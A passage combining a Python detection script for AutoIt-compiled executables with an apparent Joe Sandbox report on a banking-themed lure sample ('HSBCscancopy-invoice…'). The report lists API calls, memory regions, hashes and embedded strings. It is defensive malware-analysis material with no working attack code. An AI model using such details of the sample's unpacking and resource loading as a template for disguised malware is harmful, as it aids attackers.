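# Strings from the report.  A-suffixed APIs receive ANSI text, W-suffixed APIs
# receive UTF-16LE, so the literal in the binary is stored in that encoding.
INDICATORS: Dict[str, str] = {
    "This is a third-party compiled AutoIt script.": "ascii",  # MessageBoxA
    "AutoIt v3": "utf-16-le",                                  # CreateWindowExW class/title
    "runas": "utf-16-le",                                      # ShellExecuteW verb
}


def find_all(buf: bytes, needle: bytes) -> List[int]:
    """Every offset of needle in buf, overlaps allowed."""
    hits, start = [], 0
    while True:
        i = buf.find(needle, start)
        if i < 0:
            return hits
        hits.append(i)
        start = i + 1


def scan(buf: bytes) -> Dict[str, Dict[str, List[int]]]:
    """For each indicator, offsets in its expected encoding and in the other one,
    so a mismatch (a wide copy where ANSI was expected, or vice versa) is visible."""
    result: Dict[str, Dict[str, List[int]]] = {}
    for text, expected in INDICATORS.items():
        other = "utf-16-le" if expected == "ascii" else "ascii"
        result[text] = {
            expected: find_all(buf, text.encode(expected)),
            other: find_all(buf, text.encode(other)),
        }
    return result


def looks_like_autoit(buf: bytes) -> bool:
    """Triage verdict: both runtime-specific strings present in the encoding the
    runtime uses.  'runas' alone is far too common to count as evidence."""
    r = scan(buf)
    return bool(r["This is a third-party compiled AutoIt script."]["ascii"]) and bool(
        r["AutoIt v3"]["utf-16-le"]
    )


def yara_strings() -> str:
    """Strings section for a YARA rule with the correct ascii/wide modifier per string."""
    lines = []
    for i, (text, enc) in enumerate(INDICATORS.items()):
        lines.append(f'$s{i} = "{text}" {"ascii" if enc == "ascii" else "wide"}')
    return "\n".join(lines)


# Constructed sample buffer (not bytes from the real sample): the three strings
# laid out in the encodings the APIs imply, plus an ANSI "runas" to show the split.
SAMPLE = (
    b"\x00" * 16
    + b"This is a third-party compiled AutoIt script.\x00"
    + b"\x90" * 8
    + "AutoIt v3".encode("utf-16-le") + b"\x00\x00"
    + "runas".encode("utf-16-le") + b"\x00\x00"
    + b"runas\x00"
)

if __name__ == "__main__":
    for text, hits in scan(SAMPLE).items():
        print(f"{text!r}: {hits}")
    print("AutoIt-compiled:", looks_like_autoit(SAMPLE))
    print(yara_strings())
```

                    Run against a real file with `scan(open(path, "rb").read())`; the offsets it returns can be compared with the xrefs listed above once the image base (00E80000 here) is subtracted.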
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                    • String ID: This is a third-party compiled AutoIt script.$runas
                    • API String ID: 529118366-3287110873
                    • Opcode ID: 800c2d19f2fd2b8b4484ec05936e7767c8c984c64f75d65921bd5fc024d31f61
                    • Instruction ID: 3775c2483fe015773c632b681b03d612dd4f800abf390d95848d4825fbab2a57
                    • Opcode Fuzzy Hash: 800c2d19f2fd2b8b4484ec05936e7767c8c984c64f75d65921bd5fc024d31f61
                    • Instruction Fuzzy Hash: 3751E87490824DBBCF11FBB4DC05DED7BB4AB16704B105169F85DB21A2DAB08705EB22

                    Control-flow Graph (legend: Executed / Not Executed; rendered graph not available in text form)
                    APIs
                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00E836D2
                    • KillTimer.USER32(?,00000001), ref: 00E836FC
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E8371F
                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00E8372A
                    • CreatePopupMenu.USER32 ref: 00E8373E
                    • PostQuitMessage.USER32(00000000), ref: 00E8375F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                    • String ID: TaskbarCreated
                    • API String ID: 157504867-2362178303
                    • Opcode ID: 698a1207bd5f2a3df22d58413c36ecefe23670d2eed878cff730e09ea5481f7b
                    • Instruction ID: 5c456aaff0bc52bfd145af91423283ccb1728dd9e24018bf26a135a76a273029
                    • Opcode Fuzzy Hash: 698a1207bd5f2a3df22d58413c36ecefe23670d2eed878cff730e09ea5481f7b
                    • Instruction Fuzzy Hash: 9541E8B1104149B7DF24BB38DC09BBE3794EB12700F142529F90DF62A2EAA19A45B763

                    Control-flow Graph (legend: Executed / Not Executed; rendered graph not available in text form)
                    APIs
                    • GetVersionExW.KERNEL32(?), ref: 00E84B2B
                      • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                    • GetCurrentProcess.KERNEL32(?,00F0FAEC,00000000,00000000,?), ref: 00E84BF8
                    • IsWow64Process.KERNEL32(00000000), ref: 00E84BFF
                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00E84C45
                    • FreeLibrary.KERNEL32(00000000), ref: 00E84C50
                    • GetSystemInfo.KERNEL32(00000000), ref: 00E84C81
                    • GetSystemInfo.KERNEL32(00000000), ref: 00E84C8D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                    • String ID:
                    • API String ID: 1986165174-0
                    • Opcode ID: 314e6b8118d025a97e6cf9ce13c0f4684e4dc048d3594600ba6caf8ecabea281
                    • Instruction ID: e4433e16a8e8382cadb4df4ff79d8714ca836751c5677e6551bfb339e9f37e38
                    • Opcode Fuzzy Hash: 314e6b8118d025a97e6cf9ce13c0f4684e4dc048d3594600ba6caf8ecabea281
                    • Instruction Fuzzy Hash: CE91E57154EBC5DEC731EB6888511EBFFE4AF26304B48595ED0CFA3A41D224E908D719

                    Control-flow Graph (legend: Executed / Not Executed; rendered graph not available in text form)
                    APIs
                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E84EEE,?,?,00000000,00000000), ref: 00E85010
                    • LoadResource.KERNEL32(?,00000000,?,?,00E84EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E84F8F), ref: 00EBDD60
                    • SizeofResource.KERNEL32(?,00000000,?,?,00E84EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E84F8F), ref: 00EBDD75
                    • LockResource.KERNEL32(N,?,?,00E84EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E84F8F,00000000), ref: 00EBDD88
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Resource$FindLoadLockSizeof
                    • String ID: SCRIPT$N
                    • API String ID: 3473537107-3852340653
                    • Opcode ID: 4dd6143d0194331fef1c6bc3acd78229d9051e7dc8af089bf676796bde384281
                    • Instruction ID: cff976cf2645bb55c9c9d56331425d1561372678e3c958ad07f466362d94e118
                    • Opcode Fuzzy Hash: 4dd6143d0194331fef1c6bc3acd78229d9051e7dc8af089bf676796bde384281
                    • Instruction Fuzzy Hash: CA119A75200704AFD7319B65DC48F677BB9FBC9B11F208568F40AA6660DB61E8049660

                    Control-flow Graph (legend: Executed / Not Executed; rendered graph not available in text form)
                    APIs
                    • LoadLibraryA.KERNEL32(?), ref: 00FB21DA
                    • GetProcAddress.KERNEL32(?,00FABFF9), ref: 00FB21F8
                    • ExitProcess.KERNEL32(?,00FABFF9), ref: 00FB2209
                    • VirtualProtect.KERNELBASE(00E80000,00001000,00000004,?,00000000), ref: 00FB2257
                    • VirtualProtect.KERNEL32(00E80000,00001000), ref: 00FB226C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                    • String ID:
                    • API String ID: 1996367037-0
                    • Opcode ID: c5fe43d91b6ab9f559c988ac173efc20032336a598bb2d9bfb2c9c11908bbc94
                    • Instruction ID: e91ab2ffe7881758ab1104ce7d86546ad3439981acbc7bbd02a505e62621c538
                    • Opcode Fuzzy Hash: c5fe43d91b6ab9f559c988ac173efc20032336a598bb2d9bfb2c9c11908bbc94
                    • Instruction Fuzzy Hash: 88513672A443525BD7609ABDCCC07E5B7A0EB163747280738DAE2C73C6E7A45906EF60
                    APIs
                    • GetFileAttributesW.KERNELBASE(?,00EBE7C1), ref: 00EE46A6
                    • FindFirstFileW.KERNELBASE(?,?), ref: 00EE46B7
                    • FindClose.KERNEL32(00000000), ref: 00EE46C7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: FileFind$AttributesCloseFirst
                    • String ID:
                    • API String ID: 48322524-0
                    • Opcode ID: 09e8cb35d0ad9e45af8dcbd2edbf8776011f7160f8fcaf673d81948205b455a9
                    • Instruction ID: 14dec30f42ce9f6a9c476b8eae8c88fb7d0a1632de6d485b388d318187d8370a
                    • Opcode Fuzzy Hash: 09e8cb35d0ad9e45af8dcbd2edbf8776011f7160f8fcaf673d81948205b455a9
                    • Instruction Fuzzy Hash: 35E020714104095BC220B738EC4D8EA775CEE06335F100715F935D14E0E7B06D5495D5
                    Strings
                    • Variable must be of type 'Object'., xrefs: 00EC428C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID: Variable must be of type 'Object'.
                    • API String ID: 0-109567571
                    • Opcode ID: f534de0c19ec5a8a97e3ed7972cd7e42ed93b428ac8b00ae65f8c3aa2d95aa87
                    • Instruction ID: 65a8c775409c65bb778a097fc106ba07005840e957becf70f622aa0eaf964e83
                    • Opcode Fuzzy Hash: f534de0c19ec5a8a97e3ed7972cd7e42ed93b428ac8b00ae65f8c3aa2d95aa87
                    • Instruction Fuzzy Hash: F3A28A74A00209CFCB24EF98C580AAAB7B1FF59304F249069E91EBB351D771ED42CB91
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E90BBB
                    • timeGetTime.WINMM ref: 00E90E76
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E90FB3
                    • TranslateMessage.USER32(?), ref: 00E90FC7
                    • DispatchMessageW.USER32(?), ref: 00E90FD5
                    • Sleep.KERNEL32(0000000A), ref: 00E90FDF
                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00E9105A
                    • DestroyWindow.USER32 ref: 00E91066
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E91080
                    • Sleep.KERNEL32(0000000A,?,?), ref: 00EC52AD
                    • TranslateMessage.USER32(?), ref: 00EC608A
                    • DispatchMessageW.USER32(?), ref: 00EC6098
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EC60AC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                    • API String ID: 4003667617-3242690629
                    • Opcode ID: 78348a49e0e19dd2d96f074f93222c0686856266fde7ae94b953011fdb0b240d
                    • Instruction ID: a2a77bbe0a92ee2f69b50c664ac191c43710199179107478d33d7346d5e1d3da
                    • Opcode Fuzzy Hash: 78348a49e0e19dd2d96f074f93222c0686856266fde7ae94b953011fdb0b240d
                    • Instruction Fuzzy Hash: 4FB2F471608741DFDB28DF24C984FAAB7E4FF84308F14591DE49AA72A1DB71E885CB42

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00EE91E9: __time64.LIBCMT ref: 00EE91F3
                      • Part of subcall function 00E85045: _fseek.LIBCMT ref: 00E8505D
                    • __wsplitpath.LIBCMT ref: 00EE94BE
                      • Part of subcall function 00EA432E: __wsplitpath_helper.LIBCMT ref: 00EA436E
                    • _wcscpy.LIBCMT ref: 00EE94D1
                    • _wcscat.LIBCMT ref: 00EE94E4
                    • __wsplitpath.LIBCMT ref: 00EE9509
                    • _wcscat.LIBCMT ref: 00EE951F
                    • _wcscat.LIBCMT ref: 00EE9532
                      • Part of subcall function 00EE922F: _memmove.LIBCMT ref: 00EE9268
                      • Part of subcall function 00EE922F: _memmove.LIBCMT ref: 00EE9277
                    • _wcscmp.LIBCMT ref: 00EE9479
                      • Part of subcall function 00EE99BE: _wcscmp.LIBCMT ref: 00EE9AAE
                      • Part of subcall function 00EE99BE: _wcscmp.LIBCMT ref: 00EE9AC1
                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00EE96DC
                    • _wcsncpy.LIBCMT ref: 00EE974F
                    • DeleteFileW.KERNEL32(?,?), ref: 00EE9785
                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00EE979B
                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EE97AC
                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EE97BE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                    • String ID:
                    • API String ID: 1500180987-0
                    • Opcode ID: c29f64215e91196d3dc0f447a51f26792e29c9cb1ef8bc56eb9cc942447498b2
                    • Instruction ID: cc9e2c2aa72aafb2be144ae738e2ed6b79fbf5b1b936f633bf538dab8ebab570
                    • Opcode Fuzzy Hash: c29f64215e91196d3dc0f447a51f26792e29c9cb1ef8bc56eb9cc942447498b2
                    • Instruction Fuzzy Hash: 0BC12CB1D0021DAADF21DF95CC85ADEB7FDAF49310F0050AAF609F6152EB709A848F65

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00E84864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00F462F8,?,00E837C0,?), ref: 00E84882
                      • Part of subcall function 00EA074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00E872C5), ref: 00EA0771
                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E87308
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00EBECF1
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00EBED32
                    • RegCloseKey.ADVAPI32(?), ref: 00EBED70
                    • _wcscat.LIBCMT ref: 00EBEDC9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                    • API String ID: 2673923337-2727554177
                    • Opcode ID: 7ab9c6197bee1cfda35b6985905511e8b6f6d0b5c50219340b95a54278885c2a
                    • Instruction ID: b5b10875f8817b1c7f1af7063a176181079f7dc386698c7d8d036140da1737ba
                    • Opcode Fuzzy Hash: 7ab9c6197bee1cfda35b6985905511e8b6f6d0b5c50219340b95a54278885c2a
                    • Instruction Fuzzy Hash: ED716E755083059EC314FF65DC8189BBBE8FF59740B40542EF849A72A1DBB0DA48DF92

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00E83A62
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00E83A71
                    • LoadIconW.USER32(00000063), ref: 00E83A88
                    • LoadIconW.USER32(000000A4), ref: 00E83A9A
                    • LoadIconW.USER32(000000A2), ref: 00E83AAC
                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E83AD2
                    • RegisterClassExW.USER32(?), ref: 00E83B28
                      • Part of subcall function 00E83041: GetSysColorBrush.USER32(0000000F), ref: 00E83074
                      • Part of subcall function 00E83041: RegisterClassExW.USER32(00000030), ref: 00E8309E
                      • Part of subcall function 00E83041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00E830AF
                      • Part of subcall function 00E83041: LoadIconW.USER32(000000A9), ref: 00E830F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                    • String ID: #$0$AutoIt v3
                    • API String ID: 2880975755-4155596026
                    • Opcode ID: e1f90c0a547491bc6ffe3b061feb4dca88098706c130b0917a730a713b4dcfec
                    • Instruction ID: 98c1ba6c66f1700368dc6a796a8ffafb5afbf95dce3753cce8cd283ae86c4781
                    • Opcode Fuzzy Hash: e1f90c0a547491bc6ffe3b061feb4dca88098706c130b0917a730a713b4dcfec
                    • Instruction Fuzzy Hash: 7A211975900308BFEF10DFA4EC09B9D7BB4FB1A711F00412AE904E62A0D3BA5654AF96

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                    • API String ID: 1825951767-3513169116
                    • Opcode ID: 9b8cb5e0fdac903f3b5024a6ebdcb88bf749d33184af01572172a03c38aadf9a
                    • Instruction ID: 9fae33047d6a8880c50b3e752a7083fcfa6f00a0870ee699927556b9be9b2d92
                    • Opcode Fuzzy Hash: 9b8cb5e0fdac903f3b5024a6ebdcb88bf749d33184af01572172a03c38aadf9a
                    • Instruction Fuzzy Hash: 00A16E7191021DAACF14FBA0CC95AEEB7B8BF15700F44142AF41EB7192EF749A09DB61

                    Control-flow Graph

                    Control-flow graph (rendered image; legend: Executed / Not Executed). Function blocks e22640-e2293a; API calls on the graph: CreateFileW, VirtualAlloc, ReadFile, FindCloseChangeNotification, VirtualFree.
                    APIs
                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E22711
                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E22937
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272013729.0000000000E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e20000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CreateFileFreeVirtual
                    • String ID: +/
                    • API String ID: 204039940-4233215163
                    • Opcode ID: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
